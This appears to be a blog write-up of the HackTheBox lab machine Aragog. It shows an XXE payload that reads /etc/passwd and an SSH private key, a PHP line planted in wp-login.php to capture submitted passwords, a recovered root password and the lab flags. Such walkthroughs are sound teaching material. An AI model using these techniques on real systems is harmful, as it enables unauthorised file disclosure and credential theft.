Aragog HackTheBox Notes

Nmap -sV -T5 10.10.10.78

PORT   STATE SERVICE VERSION

21/tcp open  ftp vsftpd 3.0.3

22/tcp open  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

80/tcp open  http Apache httpd 2.4.18 ((Ubuntu))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Running dirbuster with medium wordlist

 

10.10.10.78/hosts.php => There are 4294967294 possible hosts for
This is CIDR notation /0 or Netmask 0.0.0.0

 

Possible Apache vulnerability

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.

 

OpenSSH CVE details

https://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/version_id-194112/Openbsd-Openssh-7.2.html

 

Attempting to ssh reveals we need a publickey

root@10.10.10.78: Permission denied (publickey).

 

Dirbuster found /server-status/ directory. Must be something in there.

Nothing found with php,xml,txt extensions

 

Header of the index.html page shows

If-none-match “2c39-560a6a98ed804-gzip” which will return a 304 error if the requested page has this etag_value

 

Connecting to the ftpserver as anonymous there is a file “test.txt”

Using “get test.txt -” we can see the contents

<details>

<subnet_mask>255.255.255.192</subnet_mask>

<test></test>

</details>

****This is xml syntax. This is a hint to use XML External Entity Attack (XXE) which is on the 2017 OWASP top 10 list. This allows us to exploit weakly configured XML parsers and obtain information on the server. However, for this to work we must pay attention to the flags in the file found to understand how we will obtain the desired data.

 

You can test if the site may be vulnerable to XXE by replacing the filename with /dev/random and if this triggers a loop of some sort then it is a good indicator that it is vulnerable.

 

<?xml version=”1.0” encoding=”ISO-8859-1”?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM “file=///etc/passwd” >]>

<details>

<subnet_mask>&xxe;</subnet_mask>

</details>

 

This will get us the /etc/passwd file so we may discover the users on the system. We have learned so far that we require a public key in order to access the shell via ssh. So let’s look if there are any keys available on the users found. The first user that stood out to me was the one with a home directory of course, florian.

 

Replacing etc/passwd with “home/florian/.ssh/id_rsa” will reveal the public key. Use this to obtain a shell on the box.

 

User.txt = f43bdfbcfd3f2a955a7b67c7a6e21359

 

Discovered user “cliff”

 

Using pspy I was able to notice commands running on a timely basis. Every minute commands would run.

 

2018/07/13 08:37:01 CMD: UID=1001 PID=114159 | /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=1001 PID=114158 | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=0 PID=114157 | /usr/sbin/CRON -f

2018/07/13 08:37:01 CMD: UID=1001 PID=114160 | /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=1001 PID=114162 | /usr/bin/python /home/cliff/wp-login.py

 

We can see the wp-login.py script being ran. Let’s assume that this script is inputting valid credentials into the wp-login.php file that we have the ability to alter.

 

Adding the following line to the wp-login.php file we can obtain the user input values.

file_put_contents(‘/tmp/test.txt’,file_get_contents(‘php://input’));

 

Results:

pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2

 

Noticing the URLencoding we decode the pwd value and then are able to su to root with the password !KRgYs(JFO!&MTr)lf

 

Root.txt = 9a9da52d7aad358699a96a5754595de6

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: